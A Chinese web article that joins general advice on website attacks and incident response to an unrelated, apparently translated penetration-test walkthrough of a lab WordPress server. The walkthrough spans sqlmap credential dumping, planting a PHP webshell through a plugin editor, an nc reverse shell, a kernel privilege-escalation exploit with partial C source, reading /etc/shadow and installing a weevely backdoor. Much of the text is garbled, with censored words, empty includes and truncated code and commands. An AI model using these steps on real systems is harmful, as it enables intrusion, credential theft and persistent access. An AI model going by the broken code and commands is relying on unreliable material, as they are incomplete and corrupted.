一个企业和机构在建立网站的过程中，总会遇到这样那样的 *** 攻击，不仅影响了网站的结构，更极大程度的影响了网站的收益，甚至造成网站的瘫痪，下面就为 *** 小白普及下怎么攻击网站。

　　一、对DNS服务器做出的相关攻击

　　由于中国人口密集，互联网覆盖的区域也十分的广泛，因此诸多不法分子伪装网站域名，将用户引领至非正常的网站链接内，使主网站失去对域名控制的权利，继而引起搜索引擎内部的动荡，甚至会使权重降低，最后让网站崩溃。遇到这种情况，需要域名注册商。在技术上提升自己的水平，继而保障域名的相关注册邮箱的安全性能。或者到站长平台去进行有效的申诉。

　　二、流量的攻击

　　也是十分常见的一种攻击方式，通过二级 *** 商，进行服务器的模拟，以用户的身份对相关的网站链接做出频繁的访问请求，通过对超多的数量包来覆盖甚至是淹没整个路由器和防火墙。这种情况下，会造成网站的瘫痪，出现505的页面状态，需要专业人员及时进行处理，避免被搜索引擎清空排名，使百度蜘蛛无法抓取网站。为了防止和避免这种攻击的出现，需要选择安全的防火墙主机进行服务，并选择有效的网站监控对自己的网站做出实时的监控。

　　三、针对网站程序漏洞的攻击

　　也就是我们常见的对网页的攻击，这种通过添加和嵌入非本网站的链接的操作，创建了大量的网页目录，极大的影响了用户在浏览的过程汇总，对网站内容的观看。

　　怎么攻击网站，让诸多不法分子甚至会恶意篡改网站的信息，使网站不受搜索引擎和相关的安全平台的信任，导致网站的崩溃。让用户早访问的过程时被拦截，也在一定程度上影响了网站的声誉。这就需要在创建网站的过程中，及时更新补丁，设置权限，甚至是定期的更换程序和对网站内容进行备份。如果已经被恶意的攻击了，则需要到相关平台，如安全联盟等平台进行申诉。

　　1.发现服务器被入侵，应立即关闭所有网站服务，暂停至少3小时。

　　很多站长朋友可能会想，不行呀，网站关闭几个小时，那该损失多大啊，可是你想想，一个可能被黑客修改的钓鱼网站对客户的损失大，还是一个关闭的网站呢你可以先把网站暂时跳转到一个单页面，上面写上一句话：网站维护中，预计3小时后开启访问，请各位稍后进行访问，联系方式：xxx，即可解决这个问题。

　　2.下载服务器日志(如果没被删除的话)，并且对服务器进行全盘杀毒扫描。

　　这将花费你将近1-2小时的时间，但是这是必须得做的事情，你必须确认黑客没在服务器上安装后门木马程序，同时分析系统日志，看黑客是通过哪个网站(一般被挂马的那个网站可能存在漏洞)，哪个漏洞入侵到服务器来的。找到并确认攻击源，并将黑客挂马的网址和被篡改的黑页面截图保存下来，还有黑客可能留下的个人IP或者 *** IP地址。

　　3.为系统安装最新的补丁，当然还有所有运行着的服务器软件。

　　window系统打上最新的补丁，然后就是mysql或者sql数据库补丁，还有php以及IIS，serv-u就更不用说了，经常出漏洞的东西，还有就是有些IDC们使用的虚拟主机管理软件，如N点虚拟主机管理软件、易方管理软件、华众管理软件等等。

　　4.为网站目录重新配置权限，关闭删除可疑的系统账户。

　　关闭删除所有可疑的系统帐号，尤其是那些具有高权限的系统账户!重新为所有网站目录配置权限，关闭可执行的目录权限，对图片和非脚本目录做无权限处理。

　　5.重新设置各种管理密码，开启防火墙进行端口过滤。

　　完成以上步骤后，你需要把管理员账户密码，以及数据库管理密码，特别是sql的sa密码，还有mysql的root密码，要知道，这些账户都是具有特殊权限的，黑客可以通过他们得到系统权限!

　　6.接下来，你需要对网站挨个进行处理。

　　web服务器，一般都是通过网站漏洞入侵的，你需要对网站程序进行检查(配合上面的日志分析)，对所有网站可以进行上传、写入shell的地方进行严格的检查和处理。

　　完备的善后工作：为服务器安装一个嗅探及蜜罐工具，对服务器日志进行远程备份服务，对所有网站的数据和程序进行备份操作，防止黑客恶意删除网站数据造成经济损失。在接下来的几天里要密切关注服务器和网站的运行情况，看是否还会出现黑客攻击的情况发生，然后根据日志发现并修补那些未知的漏洞。

　　通过本文你将了解黑客常用的入手思路和技术手法，适合热爱 *** 信息安全的新手朋友了解学习。本文将从最开始的信息收集开始讲述黑客是如何一步步的攻破你的网站和服务器的。阅读本文你会学到以下内容：

　　1.渗透测试前的简单信息收集。

　　2.sqlmap的使用

　　3.nmap的使用

　　4.nc反弹提权

　　5.linux系统的权限提升

　　6.backtrack 5中渗透测试工具nikto和w3af的使用等.

　　假设黑客要入侵的你的网站域名为:hack-test.com

　　让我们用ping命令获取网站服务器的IP地址

　　

　　现在我们获取了网站服务器的IP地址为:173.236.138.113

　　寻找同一服务器上的其它网站，我们使用sameip.org.

　　

　　26 sites hosted on IP Address 173.236.138.113

　　ID

　　Domain

　　Site Link

　　1

　　hijackthisforum.com

　　hijackthisforum.com

　　2

　　sportforum.net

　　sportforum.net

　　3

　　freeonlinesudoku.net

　　freeonlinesudoku.net

　　4

　　cosplayhell.com

　　cosplayhell.com

　　5

　　videogamenews.org

　　videogamenews.org

　　6

　　gametour.com

　　gametour.com

　　7

　　qualitypetsitting.net

　　qualitypetsitting.net

　　8

　　brendanichols.com

　　brendanichols.com

　　9

　　8ez.com

　　8ez.com

　　10

　　hack-test.com

　　hack-test.com

　　11

　　kisax.com

　　kisax.com

　　12

　　paisans.com

　　paisans.com

　　13

　　mghz.com

　　mghz.com

　　14

　　debateful.com

　　debateful.com

　　15

　　jazzygoodtimes.com

　　jazzygoodtimes.com

　　16

　　fruny.com

　　fruny.com

　　17

　　vbum.com

　　vbum.com

　　18

　　wuckie.com

　　wuckie.com

　　19

　　force5inc.com

　　force5inc.com

　　20

　　virushero.com

　　virushero.com

　　21

　　twincitie *** usinesspeernetwork.com

　　twincitie *** usinesspeernetwork.com

　　22

　　jennieko.com

　　jennieko.com

　　23

　　davereedy.com

　　davereedy.com

　　24

　　joygarrido.com

　　joygarrido.com

　　25

　　pri *** App.com

　　pri *** app.com

　　26

　　utiligolf.com

　　utiligolf.com

　　173.236.138.113上有26个网站，很多黑客为了攻破你的网站可能会检查同服务器上的其它网站，但是本次是以研究为目标，我们将抛开服务器上的其它网站，只针对你的网站来进行入侵检测。

　　我们需要关于你网站的以下信息：

　　1. DNS records (A, NS, TXT, MX and SOA)

　　2. Web Server Type (Apache, IIS, Tomcat)

　　3. Registrar (the company that owns your domain)

　　4. Your name, address, email and phone

　　5. Scripts that your site uses (php, asp, asp.net, jsp, cfm)

　　6. Your server OS (Unix,Linux,windows,Solaris)

　　7. Your server open ports to internet (80, 443, 21, etc.)

　　让我们开始找你网站的DNS记录，我们用who.is来完成这一目标.

　　

　　我们发现你的DNS记录如下

　　

　　让我们来确定web服务器的类型

　　

　　发现你的Web服务器是apache，接下来确定它的版本.

　　IP: 173.236.138.113

　　Website Status: active

　　Server Type: Apache

　　Alexa Trend/Rank: 1 Month:3,213,968 3 Month: 2,161,753

　　Page Views per Visit: 1 Month: 2.0 3Month: 3.7

　　

　　我们现在已经获取了你的网站域名的注册信息，包括你的重要信息等.

　　我们可以通过backtrack5中的whatweb来获取你的网站服务器操作系统类型和服务器的版本.

　　

　　

　　我们发现你的网站使用了著名的php整站程序WordPress，服务器的的系统类型为FedoraLinux，Web服务器版本Apache 2.2.15.继续查看网站服务器开放的端口，用渗透测试工具nmap:

　　1-Find services that run on server(查看服务器上运行的服务)

　　

　　2-Find server OS(查看操作系统版本)

　　

　　只有80端口是开放的,操作系统是Linux2.6.22（Fedora Core 6），现在我们已经收集了所有关于你网站的重要信息,接下来开始扫描寻找漏洞,比如:

　　Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF等等.

　　我们将使用Nikto来收集漏洞信息:

　　root@bt:/pentest/web/nikto# perlnikto.pl -h hack-test.com

　　

　　我们也会用到Backtrack 5 R1中的W3AF 工具:

　　root@bt:/pentest/web/w3af#

　　

　　我们输入要检测的网站地址,选择完整的安全审计选项.

　　

　　稍等一会，你将会看到扫描结果.

　　

　　发现你的网站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.让我们来探讨SQL注入漏洞.

　　

　　我们通过工具发现这个URL存在SQL注入，我们通过Sqlmap来检测这个url.

　　Using sqlmap with –u url

　　

　　过一会你会看到

　　

　　输入N按回车键继续

　　

　　我们发现你的网站存在MySQL显错注入，mysql数据库版本是5.0. 我们通过加入参数”-dbs”来尝试采集数据库名.

　　

　　

　　发现三个数据库,接下来通过参数”-D wordpress -tables”来查看wordpress数据库的所有表名

　　

　　

　　通过参数“-T wp_users –columns ”来查看wp_users表中的字段.

　　

　　

　　接下来猜解字段user_login和user_pass的值.用参数”-C user_login,user_pass–dump”

　　

　　我们会发现用户名和密码hashes值. 我们需要通过以下在线破解网站来破解密码hashes

　　

　　

　　登陆wordpress的后台wp-admin

　　尝试上传php webshell到服务器，以方便运行一些linux命令.在插件页面寻找任何可以编辑的插件.我们选择Textile这款插件，编辑插入我们的php webshell，点击更新文件，然后访问我们的phpwebshell.

　　

　　

　　Phpwebshell被解析了，我们可以控制你网站的文件，但是我们只希望获得网站服务器的root权限,来入侵服务器上其它的网站。

　　我们用NC来反弹一个shell,首先在我们的电脑上监听5555端口.

　　

　　然后在Php webshell上反向连接我们的电脑，输入你的IP和端口5555.

　　

　　点击连接我们会看到

　　

　　接下来我们尝试执行一些命令：

　　id

　　uid=48(apache) gid=489(apache) groups=489(apache)

　　（用来显示用户的id和组）

　　pwd

　　/var/www/html/Hackademic_RTB1/wp-content/plugins

　　（显示服务器上当前的路径）

　　uname -a

　　Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 *** P Sat Nov 721:41:45 EST 2009 i686 i686 i386 GNU/Linux

　　（显示内核版本信息）

　　

　　现在我们知道，服务器的内核版本是2.6.31.5-127.fc12.1686,我们在exploit-db.com中搜索此版本的相关漏洞.

　　在服务器上测试了很多exp之后，我们用以下的exp来提升权限.

　　

　　我们在nc shell上执行以下命令:

　　 -o roro.c

　　(下载exp到服务器并重命名为roro.c)

　　注：很多linux内核的exp都是C语言开发的,因此我们保存为.c扩展名.

　　exp roro.c代码如下：

　　#include

　　#include

　　#include

　　#include

　　#include

　　#include

　　#include

　　#include

　　#include

　　#include

　　#include

　　#define RECVPORT 5555

　　#define SENDPORT 6666

　　int prep_sock(int port)

　　{

　　int s, ret;

　　struct sockaddr_in addr;

　　s=socket(PF_RDS, SOCK_SEQPACKET, 0);

　　if(s

　　{

　　printf(“[*] Could not open socket.”);

　　exit(-1);

　　}

　　memset(&addr, 0, sizeof(addr));

　　通过以上代码我们发现该exp是C语言开发的，我们需要将他编译成elf格式的,命令如下:

　　gcc roro.c –ororo

　　接下来执行编译好的exp

　　

　　

　　执行完成之后我们输入id命令

　　id

　　我们发现我们已经是root权限了

　　uid=0(root) gid=0(root)

　　

　　现在我们可以查看/etc/shadow文件

　　cat/etc/shadow

　　

　　我们可以使用”john theripper”工具破解所有用户的密码.但是我们不会这样做，我们需要在这个服务器上留下后门以方便我们在任何时候访问它.

　　我们用weevely *** 一个php小马上传到服务器上.

　　1.weevely使用选项

　　root@bt:/pentest/backdoors/web/weevely# -

　　

　　2.用weevely创建一个密码为koko的php后门

　　root@bt:/pentest/backdoors/web/weevely# -g -o hax.php -p koko

　　

　　接下来上传到服务器之后来使用它

　　root@bt:/pentest/backdoors/web/weevely# -t - -pkoko

　　

　　测试我们的hax.php后门